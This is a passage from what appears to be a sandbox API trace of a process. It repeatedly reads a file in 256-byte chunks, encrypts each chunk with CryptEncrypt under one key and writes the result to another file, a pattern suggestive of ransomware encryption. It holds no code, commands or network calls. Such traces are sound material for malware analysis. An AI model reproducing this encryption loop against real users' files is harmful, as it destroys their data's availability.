lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.418] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.418] GetLastError () returned 0x0 [0144.418] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.418] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.418] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.418] GetLastError () returned 0x0 [0144.418] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.418] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.418] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.418] GetLastError () returned 0x0 [0144.418] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.418] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.418] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.418] GetLastError () returned 0x0 [0144.418] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.418] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.418] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.418] GetLastError () returned 0x0 [0144.418] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.418] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.418] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.418] GetLastError () returned 0x0 [0144.418] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.418] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.418] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.418] GetLastError () returned 0x0 [0144.418] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.419] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.419] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.419] GetLastError () returned 0x0 [0144.419] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.419] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.419] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.419] GetLastError () returned 0x0 [0144.419] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.419] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.419] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.419] GetLastError () returned 0x0 [0144.419] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.419] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.419] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.419] GetLastError () returned 0x0 [0144.419] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.419] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.419] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.419] GetLastError () returned 0x0 [0144.419] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.419] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.419] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.419] GetLastError () returned 0x0 [0144.419] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.419] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.420] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.420] GetLastError () returned 0x0 [0144.420] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.420] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.420] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.420] GetLastError () returned 0x0 [0144.420] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.420] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.420] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.420] GetLastError () returned 0x0 [0144.420] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.420] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.420] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.420] GetLastError () returned 0x0 [0144.420] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.420] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.420] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.420] GetLastError () returned 0x0 [0144.420] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.420] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.420] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.420] GetLastError () returned 0x0 [0144.420] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.420] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.420] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.421] GetLastError () returned 0x0 [0144.421] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.421] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.421] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.421] GetLastError () returned 0x0 [0144.421] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.421] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.421] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.421] GetLastError () returned 0x0 [0144.421] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.421] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.421] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.421] GetLastError () returned 0x0 [0144.421] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.421] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.421] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.421] GetLastError () returned 0x0 [0144.421] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.421] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.421] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.421] GetLastError () returned 0x0 [0144.421] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.421] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.421] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.421] GetLastError () returned 0x0 [0144.421] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.421] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.422] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.422] GetLastError () returned 0x0 [0144.422] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.422] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.422] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.422] GetLastError () returned 0x0 [0144.422] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.422] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.422] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.422] GetLastError () returned 0x0 [0144.422] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.422] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.422] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.422] GetLastError () returned 0x0 [0144.422] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.422] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.422] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.422] GetLastError () returned 0x0 [0144.422] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.422] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.422] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.422] GetLastError () returned 0x0 [0144.422] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.422] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.423] CryptEncrypt (in: 